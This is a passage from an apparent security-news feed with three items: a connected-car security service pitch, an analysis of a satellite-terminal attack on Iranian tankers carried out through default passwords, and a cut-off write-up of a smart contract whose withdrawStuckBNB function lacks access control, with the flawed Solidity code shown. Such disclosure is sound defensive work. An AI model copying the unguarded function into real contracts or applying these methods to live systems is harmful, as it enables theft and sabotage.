<title><![CDATA[从合规到自主防御：全场景解决方案赋能智能网联汽车安全升级]]></title> <link><![CDATA[https://www.4hou.com/posts/VWkX]]></link> <description><![CDATA[<p style="white-space: normal; margin-left: 8px; margin-right: 8px; line-height: 1.75em; visibility: visible;"><span style="font-size: 14px; letter-spacing: 0.034em; visibility: visible;">3月28日，由小鹏汽车科技有限公司与AUTO TECH China组委会联合主办的“2025汽车创新技术展示交流会”在广州小鹏汽车全球研发总部圆满落幕。本次会议聚焦“智能化、电动化、软件化、AI定义汽车”等相关技术与产品方案，汇聚汽车信息化领域企业代表、行业专家，共同探讨人工智能技术浪潮下智能电动汽车的创新发展路径。</span></p><p><br/></p><section><section><section><section><section><section><section><section></section></section></section></section></section></section><section><section><section><section><section><section></section></section></section></section></section></section></section><section><section><section><section><section><section><section></section></section></section></section></section></section><section><section><section><section><section><section><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743475476623145.png" title="1743474552527122.png" alt="截屏2025-04-01 09.52.16.png"/></section></section></section></section></section></section></section></section><section><span style="font-size: 14px; letter-spacing: 0.034em; visibility: visible;">在交流会中，梆梆安全车联网行业专家张廷伦受邀发表《智驭未来·全场景护航：智能网联汽车信息安全解决方案》主题演讲，聚焦智能网联汽车产业高速发展中的安全挑战与机遇，张廷伦指出，<strong style="visibility: visible;"><span style="letter-spacing: 0.034em; color: rgb(45, 116, 187); visibility: visible;">在远程攻击频发、数据合规监管趋严、系统架构复杂度提升的背景下，构建覆盖全生命周期的信息安全体系已成为行业关键课题。</span></strong>基于梆梆安全与主流主机厂及零部件厂商的深度合作经验，<span style="letter-spacing: 0.034em; color: rgb(45, 116, 187);"><strong>提出“智能网联汽车全场景信息安全解决方案”，助力车企实现从合规适配到自主防御的能力突破。</strong></span></span></section><section><span style="font-size: 14px; letter-spacing: 0.034em;"><span style="letter-spacing: 0.034em; color: rgb(45, 116, 187);"></span></span></section><section><section><section><section><section><section></section></section></section><section><section><section><section><section><section></section></section><section><section></section></section></section><section><section><section><p style="text-align: center;"><strong><span style="text-align: justify;">智能网联汽车全场景信息安全解决方案</span></strong></p></section></section></section><section><section><section></section></section><section><section></section></section></section></section></section></section><section><section><section></section></section></section></section></section></section><p><br/></p><p style="white-space: normal; text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743475477101213.png" title="1743474562202945.png" alt="640.png"/><span style="font-size: var(--articleFontsize); letter-spacing: 0.034em;"></span></p><p><br/></p><p style="text-indent: 0em;"><span style="color: rgb(45, 116, 187);"><strong><span style="font-size: 14px; letter-spacing: 0.476px;">1. 应用安全保障</span></strong></span></p><p style="text-indent: 0em;"><strong><span style="font-size: 14px; letter-spacing: 0.476px;">数字车钥匙：</span></strong><span style="font-size: 14px; letter-spacing: 0.476px;">以密钥白盒保护技术为核心，运行环境可信监测为辅，为汽车数字钥匙构筑一个安全可信的终端计算环境，保障汽车数字钥匙关键密钥信息安全；</span></p><p style="text-indent: 0em;"><strong><span style="font-size: 14px; letter-spacing: 0.476px;">手机/手表车联APP：</span></strong><span style="font-size: 14px; letter-spacing: 0.476px;">从事前检测、事中防护、事后监测三个阶段，全面构建车联APP纵深安全保障体系，帮助OEM提前识别风险、对抗破解逆向攻击、持续感知和阻断安全风险；</span></p><p style="text-indent: 0em;"><strong><span style="font-size: 14px; letter-spacing: 0.476px;">车端APP：</span></strong><span style="font-size: 14px; letter-spacing: 0.476px;">以安全检测平台为准入抓手，安全加固为防御手段，帮助OEM有效管控车载APP安全风险，提高车载APP的攻击对抗能力，消除车机APP安全隐患；</span></p><p style="text-indent: 0em;"><strong><span style="font-size: 14px; letter-spacing: 0.476px;">云端API交互：</span></strong><span style="font-size: 14px; letter-spacing: 0.476px;">以自动发现管理API资产为基础，结合前端风险探测能力，协助OEM有效建立API资产清单、实现API的安全治理，解决面向<span class="">TSP</span>云平台的API攻击、欺诈及数据伪造等安全问题。</span></p><p style="text-indent: 0em;"><strong style="color: rgb(45, 116, 187); text-indent: 0em;"><span style="background-color: rgb(255, 255, 255); font-size: 14px; letter-spacing: 1px;">2. 整车与零部件安全评估</span></strong></p><p style="text-indent: 0em;"><span style="font-size: 14px; letter-spacing: 0.476px;">提供基于国内外汽车信息安全法规要求（如R155/R156/GB 44495）的汽车信息安全认证咨询、TARA分析、合规安全测试、符合性测试、安全渗透测试等服务，支撑车企满足全球市场准入要求。</span></p><p style="text-indent: 0em;"><strong style="color: rgb(45, 116, 187); text-indent: 0em;"><span style="background-color: rgb(255, 255, 255); font-size: 14px; letter-spacing: 1px;">3. 数据安全合规评估</span></strong></p><p style="text-indent: 0em;"><span style="font-size: 14px; letter-spacing: 0.476px;">针对车联数据应用场景，如APP、车载APP、车机IVI等，结合GDPR、GB/T 44464等法规要求，提供的数据安全合规评估服务，确保车联数据合法合规。</span></p><p style="text-indent: 0em;"><strong style="color: rgb(45, 116, 187); text-indent: 0em;"><span style="background-color: rgb(255, 255, 255); font-size: 14px; letter-spacing: 1px;">4. 支撑能力构建</span></strong></p><p style="text-indent: 0em;"><span style="font-size: 14px; letter-spacing: 0.476px;">通过“汽车信息安全测试平台+测试工具箱+知识赋能体系”，协助车企建立自主化信息安全测试能力，实现技术闭环。</span></p><section><span style="color: rgb(89, 87, 87); font-size: 14px; letter-spacing: 0.476px;">梆梆安全作为汽车信息安全领域践行者，</span><span style="font-size: 14px; letter-spacing: 0.476px; color: rgb(45, 116, 187);"><strong><span style="letter-spacing: 0.476px;">深度参与行业技术标准制定</span>，具备多年车联网攻防对抗经验，公司泰防实验室经中国合格评定国家认可委员会（<span class="">CNAS</span>）评审，具备实施汽车网关和车载信息系统的检测工作能力被授予“实验室认可证书”资质。</strong></span><span style="color: rgb(89, 87, 87); font-size: 14px; letter-spacing: 0.476px; text-indent: 0em;">未来，梆梆安全将持续以技术驱动为核心，助力智能网联汽车产业在安全合规的轨道上行稳致远，为构建可信赖的智慧出行体验贡献力量。</span></section><p><br/></p>]]></description> <pubDate>Tue, 01 Apr 2025 10:40:28 +0800</pubDate> <author>梆梆安全</author> </item> <item> <title><![CDATA[这不是科幻片，伊朗116艘油轮通信全面瘫痪，卫星攻防就在眼前！]]></title> <link><![CDATA[https://www.4hou.com/posts/OG2r]]></link> <description><![CDATA[<p style="line-height: 150%; text-indent: 0em;"><a></a><a><strong><span style="font-size:19px;line-height: 150%">【警钟响起】</span></strong></a></p><p style="line-height: 150%; text-indent: 0em;">2025年3月19日，知名黑客组织Lab Dookhtegan宣称对伊朗两大国有航运公司旗下的116艘油轮发动了“史上最大规模”网络攻击，导致这些船只的卫星通信系统全面瘫痪。此次行动正值美国对也门胡塞武装发动军事打击期间，被外界视为针对伊朗支持地区武装的“精准报复”。</p><p style="line-height: 150%; text-indent: 0em;">据海事安全公司Cydome分析，此次攻击的核心目标是伊朗国家油轮公司（NITC）和伊斯兰共和国航运公司（IRISL）的卫星通信设备。黑客通过远程入侵船舶VSAT终端，不仅切断了船岸之间的卫星数据传输，还抹除了船舶内部网络的关键配置文件，导致船员无法通过内部通信系统协作。值得注意的是，所有攻击指令均在同一时间发送，展现出高度自动化的攻击链和精准的情报支撑。</p><p style="line-height: 150%; text-indent: 0em;">现代船舶的通信系统已成为“单点故障”——一旦卫星终端被攻破，黑客可借此渗透至导航、动力等核心系统。而中东局势持续恶化更让问题雪上加霜：胡塞武装对红海商船的袭击已导致中欧航线绕行好望角，运输成本激增40%；如今网络攻击与实体威胁交织，进一步加剧了航运行业风险。</p><p style="line-height: 150%; text-indent: 0em;">卫星通信系统遭到攻击，已经不是个例。2022年2月24日，在俄乌冲突爆发伊始，“被乌克兰军方密集使用”的卫讯（Viasat）KA-SAT卫星通信网络遭受多路蓄意网络攻击，导致乌克兰与欧洲部分区域KA-SAT卫星宽带用户服务中断。Viasat公司表示，攻击者通过破坏管理网络并发出管理命令，覆盖设备的闪存来关闭客户的家用调制解调器，使它们无法重新连接到网络。随后的调查和取证分析确定了攻击者是从地面网络发起攻击，利用VPN设备中的错误配置来远程访问KA-SAT的受信任管理网络。攻击者通过这个受信任的管理网络横向移动到用于管理和操作网络的特定网段，然后在大量住宅调制解调器上执行了有针对性的管理命令。这次攻击的直接结果是，数以万计的在线调制解调器从KA-SAT网络中掉线，无法重新加入网络。</p><p style="line-height: 150%; text-indent: 0em;"><strong><span style="font-size:19px;line-height: 150%">【深入剖析】</span></strong></p><p style="line-height: 150%; text-indent: 0em;">我们发现：面对专业黑客组织攻击，甚至上升至国家级网络空间对抗时，卫星通信系统其实非常脆弱；目前国际上针对卫星互联网的攻击，呈现高频化，扩大化的趋势；卫星互联网国内未爆发大规模安全事件，主要是因为商用民用尚未普及，没有引起黑产关注，但是使用卫星网络的用户都是高价值目标，未来一定会成为网络安全事件的重灾区。</p><p style="line-height: 150%; text-indent: 0em;">根据研究分析，伊朗油轮涉及的卫星通信设备为iDirect公司的卫星调制解调器产品。该品牌隶属于美国卫星通信行业巨头STE公司（STEngineering iDirect），该公司提供政府及军用卫星通信产品，产品类型包括iDirect调制解调器、集线器和卫星通信解决方案，主要服务于服务商、网络运营商、政府机构、大型企业、军队等客户。其Evolution系列是卫星通信场景中“星状网”的典型代表机型，包括型号：EvolutionX3、EvolutionX5、EvolutionX7系列在海事上有着广泛的应用，可以通过<a href="http://www.daydaymap.com/"><span style="color:black"><span style="color:black">w</span></span><span style="color:black"><span style="color:black">ww.daydaymap.com</span></span></a>了解全球设备分布情况。</p><p style="line-height: 150%; text-indent: 0em;">攻击组织通过对iDirect终端进行扫描和测绘，利用弱口令，获取了终端root权限，编写自动攻击脚本，使用终端自带的命令对终端存储器进行擦除，从而破坏了终端系统，造成无法正常工作。iDirect系列调制解调器通常存在默认口令，一般用户不会主动修改该密码导致默认口令的风险存在。另一方面，由于设备厂商较少提供系统更新服务，导致系统版本的陈旧也增加了较大安全风险。</p><p style="line-height: 150%; text-indent: 0em;"><strong>卫星通信系统为何如此脆弱？</strong></p><p style="line-height: 150%; text-indent: 0em;">卫星通信网络的结构导致了比地面多路由隔离的网络风险更高，由于卫星通信空中通信接口的开放性，使得黑客通过入侵小站即可进入卫星通信网，然后可以通过主站的专线直接入侵用户内网。</p><p style="line-height: 150%; text-indent: 0em;"><strong>供应链不可控且不可靠是非常大的安全隐患。</strong>目前在用的卫星通信设备主要供货商都是国外产品，国外供应商在关键设备、枢纽部件上有意无意、或多或少的预制后门，留有漏洞。有些设备厂商通过后门可以直接还原用户传输的密文数据；还有的厂商使用较为脆弱的过时加密算法，使用个人计算机即可达成破译。</p><p style="line-height: 150%; text-indent: 0em;">通过对设备固件进行提取分析发现，广泛存在厂商预置的账号，用于远程登录和管理控制。这成为了卫星网络常用的入侵手段，伊朗油轮卫星终端以及Viasat卫星网络攻击事件就是采取此类方法，存在重大安全隐患。</p><p style="line-height: 150%; text-indent: 0em;">卫星终端安全设置薄弱，网络异构，网络设置和通信设置都比较复杂，这也带来了很大的安全风险。</p><p style="line-height: 150%; text-indent: 0em;">卫星通信系统组网和控制缺乏安全防护措施，控制面、业务面、用户面共用空口信道，但是没有进行安全隔离，不同网络用户缺少安全隔离机制。卫星通信运营商目前只为用户提供基本的通信服务，缺乏完善的通信安全防护措施。</p><p style="line-height: 150%; text-indent: 0em;"><strong><span style="font-size:19px;line-height: 150%">【解决方案】</span></strong></p><p style="line-height: 150%; text-indent: 0em;">要彻底解决卫星通信的安全问题，用户需要督促卫星通信设备的供应商，升级卫星终端，尽量排除隐患。有条件的用户可以更换全国产的卫星通信系统，防止留存后门。</p><p style="line-height: 150%; text-indent: 0em;">针对在用的卫星通信系统，如何提升其安全性？盛邦安全已发布卫星互联网安全解决方案，能从查、测、防等三个方面进行安全加固，主要包含以下内容：</p><p style="line-height: 150%; text-indent: 0em;">1、卫星网络系统彻查</p><p style="line-height: 150%; text-indent: 0em;">针对卫星互联网运营单位及用户，提供空口侧、地面侧的安全检查服务，包括通信体制、通信模块、链路层协议、互联网POP节点、地面信关站及终端漏洞的脆弱性分析，并能形成安全分析报告。</p><p style="line-height: 150%; text-indent: 0em;">2、网络资产排查和分析</p><p style="line-height: 150%; text-indent: 0em;">通过卫星互联网测绘，排查卫星通信网和地面专网的信息资产暴露面及脆弱面，摸清楚资产底数，建立安全基线。</p><p style="line-height: 150%; text-indent: 0em;">3、业务网络与办公网络隔离</p><p style="line-height: 150%; text-indent: 0em;">由于卫星通信相对昂贵，移动载体通常是利用一个卫星通信信道满足多种需求，包括上网，办公，工业控制等多种业务需求，这给安全防护带来了巨大挑战。基于卫星网络特殊性，通过密码定义网络边界技术，实现控制面、业务面、互联网面在波束共用时，终端接入和数据访问权限的安全隔离。</p><p style="line-height: 150%; text-indent: 0em;">4、卫通通信的安全防护</p><p style="line-height: 150%; text-indent: 0em;">提供卫星通信加密解决方案，保障卫星终端接入的安全和通信的加密防护，为卫星通信系统提供卫星信道的安全防护措施和终端接入的安全控制。</p><p><br/></p><p style="text-indent: 0em;"><a href="https://www.webray.com.cn/news-288/7137.html" target="_self">原文链接</a></p>]]></description> <pubDate>Tue, 01 Apr 2025 10:33:28 +0800</pubDate> <author>盛邦安全</author> </item> <item> <title><![CDATA[某合约任意提取BNB漏洞]]></title> <link><![CDATA[https://www.4hou.com/posts/NG2v]]></link> <description><![CDATA[<section><section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;">1、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">背景描述</strong></p></section></section></section></section></section><p></p><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">合约是一个在满足特定条件时在区块链上执行代码的程序，各方以数字签署合同的方式准许并维护它的其运行。这些代码可以是向朋友汇款、买卖 NFT 虚拟商品等一系列复杂的内容。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"> 存在漏洞的目标合约是一个结合Meme文化病毒式传播与去中心化金融（DeFi）的创新项目，旨在通过趣味性和实用性打破传统Meme代币的模式。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">该合约的代币目前市值1400K（USDT），日均交易量150K（USDT）</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p></section><section><section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;">2、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">问题描述</strong></p></section></section></section></section></section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">该合约“withdrawStuckBNB”函数没有添加权限控制，攻击者可以通过调用“withdrawStuckBNB”函数，将合约内所有BNB转至营销地址“marketingAddress”，从而导致合约交易异常。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"> <strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; text-indent: 2em; visibility: visible;">tips：</span></strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">BNB是BNB链生态系统的原生代币，该系统包含BNB智能链（BSC）和BNB信标链。在BNB智能链上，BNB用于支付交易费用和参与网络的共识机制。BNB还被用作实用代币，使用户在Binance中心化加密货币交易所进行交易时获得交易费用的折扣。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">BNB在这个合约中的作用包括：作为交易对的配对货币，用于支付交易手续费，流动性池的组成部分，以及手续费收入的分配媒介</p></section><section><section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p></section></section></section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;">3、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">问题代码分析</strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250331/1743393528226262.png" title="1743393377764876.png" alt="QQ20250331-115624.png"/></strong></p><section><pre style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 1em 1em 1em 0px;outline: 0px;max-width: 1000%;overflow-x: auto;white-space: normal;flex: 1 1 0%;box-sizing: border-box !important;overflow-wrap: break-word !important"><p style="text-indent: 0em;">```solidity<br/>function withdrawStuckBNB() external {    <br/>bool success;    <br/>(success,) = address(marketingAddress).call{value: address(this).balance}("");<br/>}<br/>```<br/></p></pre></section><p></p><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">在合约代码里面可以看到，`withdrawStuckBNB` 没有添加onlyOwner修饰，只有external修饰</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">tips：</strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">    Solidity语法中有4中默认函数修饰符</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">    - public：最大访问权限，任何人都可以调用。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">    - private：只有合约内部可以调用，不可以被继承。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">    - internal：子合约可以继承和调用。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">    - external：外部可以调用，子合约可以继承和调用，当前合约不可以调用。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-wrap-mode: wrap; background-color: rgb(255, 255, 255); text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">onlyOwner是该合约自定义一个修饰器，用于修饰函数，只有合约的所有者才能调用该函数。</p><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;text-indent: 2em;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></p></section><p></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250331/1743393529549236.png" title="1743393431623111.png" alt="QQ20250331-115722.png"/></strong></p><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">这就意味着任何人都可以调用这个函数，将合约内所有BNB转至营销地址，导致资金被盗。</p></section><p></p><section><section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p></section></section></section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">4</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">、后续利用链分析</strong></p></section></section></section></section></section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">从问题代码可知，任何人都可以调用这个函数，将合约内所有BNB转至营销地址marketingAddress</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">查看marketingAddress的代码，marketingAddress是一个营销地址，更新marketingAddress的代码如下：</p></section><p></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250331/1743393530288061.png" title="1743393457608362.png" alt="QQ20250331-115745.png"/></p></section></section></section></section></section><p></p><p style="text-indent: 0em;"><span style="color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-indent: 32px; text-wrap-mode: wrap; background-color: rgb(255, 255, 